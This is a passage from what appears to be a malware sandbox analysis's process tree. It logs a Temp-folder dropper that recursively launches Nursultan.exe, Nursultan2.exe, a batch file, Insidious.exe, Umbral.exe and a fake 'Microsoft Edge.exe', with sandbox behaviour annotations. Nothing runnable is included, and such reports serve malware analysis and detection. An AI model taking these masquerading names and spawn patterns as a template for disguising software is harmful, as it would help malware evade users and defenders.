        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        39⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        38⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        39⤵
        
        PID:448
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        40⤵
        
        PID:1284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        41⤵
        
        PID:2964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        42⤵
        
        PID:1816
        
        C:\Windows\system32\cmd.exe
        
        cmd
        42⤵
        
        PID:640
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        41⤵
        
        PID:2372
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        41⤵
        Delays execution with timeout.exe
        
        PID:2104
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        41⤵
        
        PID:928
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        40⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        40⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        39⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        40⤵
        
        PID:2532
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        41⤵
        
        PID:1896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        42⤵
        
        PID:2392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        43⤵
        
        PID:2468
        
        C:\Windows\system32\cmd.exe
        
        cmd
        43⤵
        
        PID:2816
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        42⤵
        
        PID:640
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        42⤵
        Delays execution with timeout.exe
        
        PID:1740
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        42⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        41⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        41⤵
        
        PID:1696
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        41⤵
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        40⤵
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        41⤵
        
        PID:1040
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        42⤵
        
        PID:356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        43⤵
        
        PID:2624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        44⤵
        
        PID:2012
        
        C:\Windows\system32\cmd.exe
        
        cmd
        44⤵
        
        PID:1444
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        43⤵
        
        PID:2816
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        43⤵
        Delays execution with timeout.exe
        
        PID:2392
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        43⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        42⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        42⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        
        PID:836
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        41⤵
        
        PID:3028
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        42⤵
        
        PID:344
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        43⤵
        
        PID:2240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        44⤵
        
        PID:2424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        45⤵
        
        PID:1808
        
        C:\Windows\system32\cmd.exe
        
        cmd
        45⤵
        
        PID:2848
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        44⤵
        
        PID:2716
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        44⤵
        Delays execution with timeout.exe
        
        PID:2624
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        44⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        43⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        43⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        42⤵
        
        PID:1192
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        43⤵
        
        PID:2956
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        44⤵
        
        PID:2504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        45⤵
        
        PID:2716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        46⤵
        
        PID:2168
        
        C:\Windows\system32\cmd.exe
        
        cmd
        46⤵
        
        PID:2564
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        45⤵
        
        PID:2832
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        45⤵
        Delays execution with timeout.exe
        
        PID:1756
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        45⤵
        
        PID:952
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        44⤵
        
        PID:1696
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        44⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        43⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        44⤵
        
        PID:884
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        45⤵
        
        PID:1916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        46⤵
        
        PID:1132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        47⤵
        
        PID:2196
        
        C:\Windows\system32\cmd.exe
        
        cmd
        47⤵
        
        PID:576
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        46⤵
        
        PID:2412
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        46⤵
        Delays execution with timeout.exe
        
        PID:1636
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        46⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        45⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        45⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        44⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        45⤵
        
        PID:2400
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        46⤵
        
        PID:1816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        47⤵
        
        PID:2648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        48⤵
        
        PID:2524
        
        C:\Windows\system32\cmd.exe
        
        cmd
        48⤵
        
        PID:2660
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        47⤵
        
        PID:2744
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        47⤵
        
        PID:1688
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        47⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        46⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        46⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        45⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        46⤵
        
        PID:1828
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        47⤵
        
        PID:1692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        48⤵
        
        PID:1808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        49⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        cmd
        49⤵
        
        PID:928
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        48⤵
        
        PID:2744
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        48⤵
        Delays execution with timeout.exe
        
        PID:1608
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        48⤵
        
        PID:3328
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        47⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        47⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        47⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        46⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        47⤵
        
        PID:952
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        48⤵
        
        PID:1628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        49⤵
        
        PID:2768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        50⤵
        
        PID:1844
        
        C:\Windows\system32\cmd.exe
        
        cmd
        50⤵
        
        PID:2372
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        49⤵
        
        PID:2052
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        49⤵
        Delays execution with timeout.exe
        
        PID:1848
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        49⤵
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        48⤵
        
        PID:700
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        48⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        48⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        47⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        48⤵
        
        PID:2828
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        49⤵
        
        PID:3392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        50⤵
        
        PID:3528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        51⤵
        
        PID:3560
        
        C:\Windows\system32\cmd.exe
        
        cmd
        51⤵
        
        PID:3572
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        50⤵
        
        PID:3604
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        50⤵
        Delays execution with timeout.exe
        
        PID:3612
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        50⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        49⤵
        Checks processor information in registry
        
        PID:3420
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        49⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        48⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        49⤵
        
        PID:3356
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        50⤵
        
        PID:3832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        51⤵
        
        PID:3996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        52⤵
        
        PID:4004
        
        C:\Windows\system32\cmd.exe
        
        cmd
        52⤵
        
        PID:4012
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        51⤵
        
        PID:4020
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        51⤵
        Delays execution with timeout.exe
        
        PID:4028
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        51⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        50⤵
        
        PID:3848
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        50⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        49⤵
        
        PID:3432
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        50⤵
        
        PID:3800
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        51⤵
        
        PID:2028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        52⤵
        
        PID:2956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        53⤵
        
        PID:408
        
        C:\Windows\system32\cmd.exe
        
        cmd
        53⤵
        
        PID:2660
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        52⤵
        
        PID:592
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        52⤵
        Delays execution with timeout.exe
        
        PID:3020
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        52⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        51⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        51⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        51⤵
        
        PID:324
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        50⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        51⤵
        
        PID:4084
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        52⤵
        
        PID:2648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        53⤵
        
        PID:3816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        54⤵
        
        PID:3784
        
        C:\Windows\system32\cmd.exe
        
        cmd
        54⤵
        
        PID:3896
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        53⤵
        
        PID:3852
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        53⤵
        Delays execution with timeout.exe
        
        PID:3988
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        53⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        52⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        52⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        51⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        52⤵
        
        PID:3936
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        53⤵
        
        PID:3520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        54⤵
        
        PID:3844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        55⤵
        
        PID:2956
        
        C:\Windows\system32\cmd.exe
        
        cmd
        55⤵
        
        PID:592
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        54⤵
        
        PID:3156
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        54⤵
        Delays execution with timeout.exe
        
        PID:3172
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        54⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        53⤵
        Checks processor information in registry
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        53⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        53⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        52⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        53⤵
        
        PID:4036
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        54⤵
        
        PID:2760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        55⤵
        
        PID:600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        56⤵
        
        PID:3408
        
        C:\Windows\system32\cmd.exe
        
        cmd
        56⤵
        
        PID:3400
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        55⤵
        
        PID:3428
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        55⤵
        Delays execution with timeout.exe
        
        PID:3384
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        55⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        54⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        54⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        54⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        53⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        54⤵
        
        PID:3228
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        55⤵
        
        PID:3352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        56⤵
        
        PID:2732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        57⤵
        
        PID:3748
        
        C:\Windows\system32\cmd.exe
        
        cmd
        57⤵
        
        PID:3768
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        56⤵
        
        PID:3784
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        56⤵
        
        PID:3940
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        56⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        55⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        55⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        55⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        54⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        55⤵
        
        PID:3572
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        56⤵
        
        PID:1808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        57⤵
        
        PID:3788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        58⤵
        
        PID:3360
        
        C:\Windows\system32\cmd.exe
        
        cmd
        58⤵
        
        PID:4000
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        57⤵
        
        PID:3780
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        57⤵
        Delays execution with timeout.exe
        
        PID:4044
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        57⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        56⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        56⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        56⤵
        
        PID:3952
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        55⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        56⤵
        
        PID:3736
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        57⤵
        
        PID:944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        58⤵
        
        PID:3972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        59⤵
        
        PID:3864
        
        C:\Windows\system32\cmd.exe
        
        cmd
        59⤵
        
        PID:3140
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        58⤵
        
        PID:3948
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        58⤵
        Delays execution with timeout.exe
        
        PID:3776
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        58⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        57⤵
        
        PID:2468
        
